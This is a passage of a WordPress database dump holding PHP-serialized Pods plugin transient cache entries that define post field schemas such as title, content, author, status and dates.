ber\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}}','off'),(5633859,'_transient_timeout_pods_18509f93ab253e4c4230e84af5184fc7','1782359389','off'),(5633860,'_transient_pods_18509f93ab253e4c4230e84af5184fc7','a:0:{}','off'),(5637002,'_transient_timeout_pods_d44aea43fa2daa761bcbd8707392d100','1782447084','off'),(5637003,'_transient_pods_d44aea43fa2daa761bcbd8707392d100','a:24:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping 